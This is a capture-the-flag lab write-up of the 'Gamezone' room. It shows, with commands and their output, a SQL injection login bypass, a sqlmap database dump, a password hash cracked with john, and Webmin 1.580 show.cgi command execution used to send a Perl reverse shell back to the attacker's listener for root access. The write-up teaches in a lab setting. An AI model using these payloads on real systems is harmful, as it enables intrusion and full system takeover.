Gamezone

Sep 20, 2020 john the ripper burpsuite sql injection
Share on:

Overview

Gamezone

Recon

 1nmap -A -T4 -Pn -oA nmap1000.gamezone.txt 10.10.139.135 
 2
 3Output:
 4Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-21 21:02 EDT
 5Nmap scan report for 10.10.139.135
 6Host is up (0.078s latency).
 7Not shown: 998 closed ports
 8PORT   STATE SERVICE VERSION
 922/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
10| ssh-hostkey: 
11|   2048 61:ea:89:f1:d4:a7:dc:a5:50:f7:6d:89:c3:af:0b:03 (RSA)
12|   256 b3:7d:72:46:1e:d3:41:b6:6a:91:15:16:c9:4a:a5:fa (ECDSA)
13|_  256 53:67:09:dc:ff:fb:3a:3e:fb:fe:cf:d8:6d:41:27:ab (ED25519)
1480/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
15| http-cookie-flags: 
16|   /: 
17|     PHPSESSID: 
18|_      httponly flag not set
19|_http-server-header: Apache/2.4.18 (Ubuntu)
20|_http-title: Game Zone
21No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
22TCP/IP fingerprint:
23OS:SCAN(V=7.80%E=4%D=9/21%OT=22%CT=1%CU=42848%PV=Y%DS=4%DC=T%G=Y%TM=5F694D3
24OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS=8)OPS
25OS:(O1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST1
26OS:1NW7%O6=M506ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
27OS:(R=Y%DF=Y%T=40%W=6903%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
28OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
29OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
30OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
31OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
32OS:=S)
33
34Network Distance: 4 hops
35Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
36
37TRACEROUTE (using port 110/tcp)
38HOP RTT      ADDRESS
391   7.70 ms  10.6.0.1
402   ... 3
414   79.58 ms 10.10.139.135
42
43OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
44Nmap done: 1 IP address (1 host up) scanned in 30.90 seconds
45

Enumeration

Only port 80 and 22 are open and nothing else interesting is happening, let’s access the port 80 using the browser.

Login Form

The login form on this machine is vulnerable to the sql injection attacks per the instructions and you should try with different inputs to see if you can get in.

I was able to get in with my first couple of tries. The following input works -

1' or 1 =1;--

As soon as you hit enter, you will be redirected to “http://10.10.139.135/portal.php” , as the room instructions suggest we will then proceed with exploiting the search box on the potal.php. At this point setup your burp proxy and use the search form to intercept the request and save it to the file.

Burp Intercept

Hint: Save the raw request as a text file.

 1POST /portal.php HTTP/1.1
 2Host: 10.10.139.135
 3User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
 4Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 5Accept-Language: en-US,en;q=0.5
 6Accept-Encoding: gzip, deflate
 7Referer: http://10.10.139.135/portal.php
 8Content-Type: application/x-www-form-urlencoded
 9Content-Length: 15
10Connection: close
11Cookie: PHPSESSID=t1onpvp2errfn3vibjs9tp76q3
12Upgrade-Insecure-Requests: 1
13
14searchitem=doom
15

Now, lets run the sqlmap tool

 1#sqlmap -r search-request.txt --dbms=mysql --dump
 2...
 3...
 4...
 5do you want to crack them via a dictionary-based attack? [Y/n/q] n
 6Database: db
 7Table: users
 8[1 entry]
 9+------------------------------------------------------------------+----------+
10| pwd                                                              | username |
11+------------------------------------------------------------------+----------+
12| xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx | xxxxxxx  |
13+------------------------------------------------------------------+----------+
14
15[21:49:35] [INFO] table 'db.users' dumped to CSV file '/root/.local/share/sqlmap/output/10.10.139.135/dump/db/users.csv'
16

Now that we have a hashed password, we can try to crack the password using john.

 1# john user-hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
 2Using default input encoding: UTF-8
 3Loaded 1 password hash (Raw-SHA256 [SHA256 256/256 AVX2 8x])
 4Warning: poor OpenMP scalability for this hash type, consider --fork=2
 5Will run 2 OpenMP threads
 6Press 'q' or Ctrl-C to abort, almost any other key for status
 7XXXXXXXXXXXXXX    (?)
 81g 0:00:00:00 DONE (2020-09-21 21:56) 5.555g/s 16201Kp/s 16201Kc/s 16201KC/s vimivi..veluca
 9Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
10Session completed
11

Exploit

With the password cracked, now we can try to login over SSH. (If you remember we had SSH port listening on the default port ie. 22)

 1# ssh [email protected]
 2The authenticity of host '10.10.139.135 (10.10.139.135)' can't be established.
 3ECDSA key fingerprint is SHA256:mpNHvzp9GPoOcwmWV/TMXiGwcqLIsVXDp5DvW26MFi8.
 4Are you sure you want to continue connecting (yes/no/[fingerprint])? yes          
 5Warning: Permanently added '10.10.139.135' (ECDSA) to the list of known hosts.
 6[email protected]'s password: 
 7Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)
 8
 9 * Documentation:  https://help.ubuntu.com
10 * Management:     https://landscape.canonical.com
11 * Support:        https://ubuntu.com/advantage
12
13109 packages can be updated.
1468 updates are security updates.
15
16
17Last login: Fri Aug 16 17:52:04 2019 from 192.168.1.147
18agent47@gamezone:~$ ls -l
19total 4
20-rw-rw-r-- 1 agent47 agent47 33 Aug 16  2019 user.txt
21agent47@gamezone:~$ cat user.txt 
22XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
23

 1# ssh -L 10000:localhost:10000 [email protected]
 2[email protected]'s password: 
 3Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)
 4
 5 * Documentation:  https://help.ubuntu.com
 6 * Management:     https://landscape.canonical.com
 7 * Support:        https://ubuntu.com/advantage
 8
 9109 packages can be updated.
1068 updates are security updates.
11
12
13Last login: Mon Sep 21 20:57:03 2020 from 10.6.19.215
14agent47@gamezone:~$ 
15agent47@gamezone:~$ apt search webmin
16Sorting... Done
17Full Text Search... Done
18webmin/now X.XXX all [installed,local]
19  web-based administration interface for Unix systems
20
21agent47@gamezone:~$ 
22

Under the user’s home, we will be able to find the user.txt with the user flag. Upon further inspection of the ports for local service enumeration of ports, we will see port 10000 in use.

 1agent47@gamezone:~$ netstat -lnt
 2Active Internet connections (only servers)
 3Proto Recv-Q Send-Q Local Address           Foreign Address         State      
 4tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
 5tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN     
 6tcp        0      0 0.0.0.0:10000           0.0.0.0:*               LISTEN     
 7tcp6       0      0 :::22                   :::*                    LISTEN     
 8tcp6       0      0 :::80                   :::*                    LISTEN     
 9agent47@gamezone:~$ 
10
11
12agent47@gamezone:~$ curl localhost:10000
13<!doctype html public "-//W3C//DTD HTML 3.2 Final//EN">
14<html>
15<head>
16<link rel='stylesheet' type='text/css' href='/unauthenticated/style.css' />
17<script type='text/javascript' src='/unauthenticated/toggleview.js'></script>
18<script>
19var rowsel = new Array();
20</script>
21<script type='text/javascript' src='/unauthenticated/sorttable.js'></script>
22<meta http-equiv="Content-Type" content="text/html; Charset=iso-8859-1">
23<title>Login to Webmin</title></head>
24<body bgcolor=#ffffff link=#0000ee vlink=#0000ee text=#000000    onLoad='document.forms[0].pass.value = ""; document.forms[0].user.focus()'>
25<table class='header' width=100%><tr>
26<td id='headln2l' width=15% valign=top align=left></td>
27<td id='headln2c' align=center width=70%><font size=+2></font></td>
28<td id='headln2r' width=15% valign=top align=right></td></tr></table>
29<p><center>
30
31

We found that webmin is running. Lets find more -

1agent47@gamezone:~$ apt search webmin
2Sorting... Done
3Full Text Search... Done
4webmin/now 1.580 all [installed,local]
5  web-based administration interface for Unix systems
6
7agent47@gamezone:~$ 
8

We now know that webmin 1.580 is installed. And the webmin process seems to be running as “root” user.

Now, forward the port over ssh and access port 10000 from browser

1$ ssh -L 10000:localhost:10000 [email protected]
2[email protected]'s password: 
3Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)
4

On the browser, visit http://localhost:10000 and you will be greeted with the login form. I tried the agent47 username and password and it worked! Lets find out vulnerabilities with the webmin 1.580 using searchsploit.

1searchsploit webmin 1.58
2------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
3 Exploit Title                                                                                                                                                                                              |  Path
4------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
5Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit)                                                                                                                                       | unix/remote/21851.rb
6Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)                                                                                                                                         | multiple/remote/2017.pl
7Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP)                                                                                                                                          | multiple/remote/1997.php
8Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit)                                                                                                                                               | linux/webapps/47330.rb
9------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------

Read the unix/remote/21851.rb and you will see a simple way to execute our payload.

Read the exploit code

show.cgi seems interesting and we can leverage that to execute some payloads. I tried reading several OS files with this from the browser.

Passwd file

Shadow file

And obviously the /root/root.txt for the root flag. However, there is more to try and learn here.

Post Exploit - Privesc

Start a local listener

nc -lvnp 9000

Now, lets try to get a reverse shell as root https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

On local browser:

1http://localhost:10000/file/show.cgi/4uIPiqNld|perl%20-e%20'use%20Socket;$i=%2210.6.19.215%22;$p=9000;socket(S,PF_INET,SOCK_STREAM,getprotobyname(%22tcp%22));if(connect(S,sockaddr_in($p,inet_aton($i))))%7Bopen(STDIN,%22%3E&S%22);open(STDOUT,%22%3E&S%22);open(STDERR,%22%3E&S%22);exec(%22/bin/sh%20-i%22);%7D;'|

You should now get a shell back.

1$ nc -lvnp 9000
2listening on [any] 9000 ...
3connect to [10.6.19.215] from (UNKNOWN) [10.10.248.24] 37924
4/bin/sh: 0: can't access tty; job control turned off
5# whoami
6root
7#

There we have it!